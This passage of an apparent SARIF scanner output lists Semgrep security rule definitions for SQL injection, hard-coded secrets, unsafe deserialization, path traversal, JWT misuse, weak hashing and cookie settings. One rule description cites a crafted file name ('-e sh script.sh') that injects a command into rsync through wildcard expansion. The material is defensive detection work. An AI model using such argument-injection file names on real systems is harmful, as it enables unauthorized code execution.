prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.jpa-sqli.jpa-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"helpUri":"https://semgrep.dev/r/java.spring.security.jpa-sqli.jpa-sqli","id":"java.spring.security.jpa-sqli.jpa-sqli","name":"java.spring.security.jpa-sqli.jpa-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.jpa-sqli.jpa-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token","id":"javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token","name":"javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an AWS Redshift configuration with a SSL disabled. To fix this, set your `require_ssl` to `\"true\"`."},"help":{"markdown":"Detected an AWS Redshift configuration with a SSL disabled. To fix this, set your `require_ssl` to `\"true\"`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected an AWS Redshift configuration with a SSL disabled. To fix this, set your `require_ssl` to `\"true\"`."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration","id":"terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration","name":"terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html](https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda","id":"python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda","name":"python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for redefinitions of functions that check TLS/SSL certificate verification. This can lead to vulnerabilities, as simple errors in the code can result in lack of proper certificate validation. This should only be used for debugging purposes because it leads to vulnerability to MTM attacks."},"help":{"markdown":"Checks for redefinitions of functions that check TLS/SSL certificate verification. This can lead to vulnerabilities, as simple errors in the code can result in lack of proper certificate validation. This should only be used for debugging purposes because it leads to vulnerability to MTM attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification)\n - [https://stackoverflow.com/questions/4072585/disabling-ssl-certificate-validation-in-spring-resttemplate](https://stackoverflow.com/questions/4072585/disabling-ssl-certificate-validation-in-spring-resttemplate)\n - [https://stackoverflow.com/questions/35530558/how-to-fix-unsafe-implementation-of-x509trustmanager-in-android-app?rq=1](https://stackoverflow.com/questions/35530558/how-to-fix-unsafe-implementation-of-x509trustmanager-in-android-app?rq=1)\n","text":"Checks for redefinitions of functions that check TLS/SSL certificate verification. This can lead to vulnerabilities, as simple errors in the code can result in lack of proper certificate validation. This should only be used for debugging purposes because it leads to vulnerability to MTM attacks."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification","id":"problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification","name":"problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Mako templates do not provide a global HTML escaping mechanism. This means you must escape all sensitive data in your templates using '| u' for URL escaping or '| h' for HTML escaping. If you are using Mako to serve web content, consider using a system such as Jinja2 which enables global escaping."},"help":{"markdown":"Mako templates do not provide a global HTML escaping mechanism. This means you must escape all sensitive data in your templates using '| u' for URL escaping or '| h' for HTML escaping. If you are using Mako to serve web content, consider using a system such as Jinja2 which enables global escaping.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.mako-templates-detected.mako-templates-detected)\n - [https://docs.makotemplates.org/en/latest/syntax.html#expression-escaping](https://docs.makotemplates.org/en/latest/syntax.html#expression-escaping)\n - [https://jinja.palletsprojects.com/en/2.11.x/intro/#](https://jinja.palletsprojects.com/en/2.11.x/intro/#)\n","text":"Mako templates do not provide a global HTML escaping mechanism. This means you must escape all sensitive data in your templates using '| u' for URL escaping or '| h' for HTML escaping. If you are using Mako to serve web content, consider using a system such as Jinja2 which enables global escaping."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.mako-templates-detected.mako-templates-detected","id":"python.lang.security.audit.mako-templates-detected.mako-templates-detected","name":"python.lang.security.audit.mako-templates-detected.mako-templates-detected","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.mako-templates-detected.mako-templates-detected"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi","id":"python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi","name":"python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The return value of `$VAR.$NPOS_CALL(...)` has been modified so it can never equal `std::string::npos`. This could lead to an `std::out_of_range` exception being thrown or trigger an out-of-bounds read if the position is used as an array index."},"help":{"markdown":"The return value of `$VAR.$NPOS_CALL(...)` has been modified so it can never equal `std::string::npos`. This could lead to an `std::out_of_range` exception being thrown or trigger an out-of-bounds read if the position is used as an array index.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.std-string-npos.std-string-npos)\n - [https://wiki.sei.cmu.edu/confluence/display/cplusplus/CTR55-CPP.+Do+not+use+an+additive+operator+on+an+iterator+if+the+result+would+overflow](https://wiki.sei.cmu.edu/confluence/display/cplusplus/CTR55-CPP.+Do+not+use+an+additive+operator+on+an+iterator+if+the+result+would+overflow)\n","text":"The return value of `$VAR.$NPOS_CALL(...)` has been modified so it can never equal `std::string::npos`. This could lead to an `std::out_of_range` exception being thrown or trigger an out-of-bounds read if the position is used as an array index."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.std-string-npos.std-string-npos","id":"cpp.lang.security.strings.std-string-npos.std-string-npos","name":"cpp.lang.security.strings.std-string-npos.std-string-npos","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.std-string-npos.std-string-npos"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found user input going directly into typecast for bool(), float(), or complex(). This allows an attacker to inject Python's not-a-number (NaN) into the typecast. This results in undefind behavior, particularly when doing comparisons. Either cast to a different type, or add a guard checking for all capitalizations of the string 'nan'."},"help":{"markdown":"Found user input going directly into typecast for bool(), float(), or complex(). This allows an attacker to inject Python's not-a-number (NaN) into the typecast. This results in undefind behavior, particularly when doing comparisons. Either cast to a different type, or add a guard checking for all capitalizations of the string 'nan'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.nan-injection.nan-injection)\n - [https://discuss.python.org/t/nan-breaks-min-max-and-sorting-functions-a-solution/2868](https://discuss.python.org/t/nan-breaks-min-max-and-sorting-functions-a-solution/2868)\n - [https://blog.bitdiscovery.com/2021/12/python-nan-injection/](https://blog.bitdiscovery.com/2021/12/python-nan-injection/)\n","text":"Found user input going directly into typecast for bool(), float(), or complex(). This allows an attacker to inject Python's not-a-number (NaN) into the typecast. This results in undefind behavior, particularly when doing comparisons. Either cast to a different type, or add a guard checking for all capitalizations of the string 'nan'."},"helpUri":"https://semgrep.dev/r/python.django.security.nan-injection.nan-injection","id":"python.django.security.nan-injection.nan-injection","name":"python.django.security.nan-injection.nan-injection","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.nan-injection.nan-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a psycopg2 Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use prepared statements by creating a 'sql.SQL' string. You can also use the pyformat binding style to create parameterized queries. For example: 'cur.execute(SELECT * FROM table WHERE name=%s, user_input)'"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a psycopg2 Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use prepared statements by creating a 'sql.SQL' string. You can also use the pyformat binding style to create parameterized queries. For example: 'cur.execute(SELECT * FROM table WHERE name=%s, user_input)'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli)\n - [https://www.psycopg.org/docs/sql.html](https://www.psycopg.org/docs/sql.html)\n","text":"Detected string concatenation with a non-literal variable in a psycopg2 Python SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use prepared statements by creating a 'sql.SQL' string. You can also use the pyformat binding style to create parameterized queries. For example: 'cur.execute(SELECT * FROM table WHERE name=%s, user_input)'"},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli","id":"python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli","name":"python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.sqli.psycopg-sqli.psycopg-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Call '.verify()' before using the token."},"help":{"markdown":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Call '.verify()' before using the token.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Call '.verify()' before using the token."},"helpUri":"https://semgrep.dev/r/javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify","id":"javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify","name":"javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify","properties":{"precision":"very-high","tags":["CWE-345: Insufficient Verification of Data Authenticity","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jsonwebtoken.security.audit.jwt-decode-without-verify.jwt-decode-without-verify"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found user-controlled request data being passed into a file open, which is them passed as an argument into the FileResponse. This is dangerous because an attacker could specify an arbitrary file to read, which could result in leaking important data. Be sure to validate or sanitize the user-inputted filename in the request data before using it in FileResponse."},"help":{"markdown":"Found user-controlled request data being passed into a file open, which is them passed as an argument into the FileResponse. This is dangerous because an attacker could specify an arbitrary file to read, which could result in leaking important data. Be sure to validate or sanitize the user-inputted filename in the request data before using it in FileResponse.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.request-data-fileresponse.request-data-fileresponse)\n - [https://django-book.readthedocs.io/en/latest/chapter20.html#cross-site-scripting-xss](https://django-book.readthedocs.io/en/latest/chapter20.html#cross-site-scripting-xss)\n","text":"Found user-controlled request data being passed into a file open, which is them passed as an argument into the FileResponse. This is dangerous because an attacker could specify an arbitrary file to read, which could result in leaking important data. Be sure to validate or sanitize the user-inputted filename in the request data before using it in FileResponse."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.request-data-fileresponse.request-data-fileresponse","id":"python.django.security.injection.request-data-fileresponse.request-data-fileresponse","name":"python.django.security.injection.request-data-fileresponse.request-data-fileresponse","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.request-data-fileresponse.request-data-fileresponse"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of the wildcard character in a system call that spawns a shell. This subjects the wildcard to normal shell expansion, which can have unintended consequences if there exist any non-standard file names. Consider a file named '-e sh script.sh' -- this will execute a script when 'rsync' is called. See https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt for more information."},"help":{"markdown":"Detected use of the wildcard character in a system call that spawns a shell. This subjects the wildcard to normal shell expansion, which can have unintended consequences if there exist any non-standard file names. Consider a file named '-e sh script.sh' -- this will execute a script when 'rsync' is called. See https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.system-wildcard-detected.system-wildcard-detected)\n - [https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt](https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt)\n","text":"Detected use of the wildcard character in a system call that spawns a shell. This subjects the wildcard to normal shell expansion, which can have unintended consequences if there exist any non-standard file names. Consider a file named '-e sh script.sh' -- this will execute a script when 'rsync' is called. See https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt for more information."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.system-wildcard-detected.system-wildcard-detected","id":"python.lang.security.audit.system-wildcard-detected.system-wildcard-detected","name":"python.lang.security.audit.system-wildcard-detected.system-wildcard-detected","properties":{"precision":"very-high","tags":["CWE-155: Improper Neutralization of Wildcards or Matching Symbols","LOW CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.system-wildcard-detected.system-wildcard-detected"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected MD4 hash algorithm which is considered insecure. MD4 is not collision resistant and is therefore not suitable as a cryptographic signature. Use a modern hash algorithm from the SHA-2, SHA-3, or BLAKE2 family instead."},"help":{"markdown":"Detected MD4 hash algorithm which is considered insecure. MD4 is not collision resistant and is therefore not suitable as a cryptographic signature. Use a modern hash algorithm from the SHA-2, SHA-3, or BLAKE2 family instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4)\n - [https://www.pycryptodome.org/src/hash/hash#modern-hash-algorithms](https://www.pycryptodome.org/src/hash/hash#modern-hash-algorithms)\n - [https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html](https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html)\n - [https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability)\n - [http://2012.sharcs.org/slides/stevens.pdf](http://2012.sharcs.org/slides/stevens.pdf)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n","text":"Detected MD4 hash algorithm which is considered insecure. MD4 is not collision resistant and is therefore not suitable as a cryptographic signature. Use a modern hash algorithm from the SHA-2, SHA-3, or BLAKE2 family instead."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4","id":"python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4","name":"python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-hash-algorithm-md4.insecure-hash-algorithm-md4"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret","id":"python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret","name":"python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.mariadb.python-mariadb-hardcoded-secret.python-mariadb-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"helpUri":"https://semgrep.dev/r/java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none","id":"java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none","name":"java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.audit.cookies.cookie-samesite-none.cookie-samesite-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and 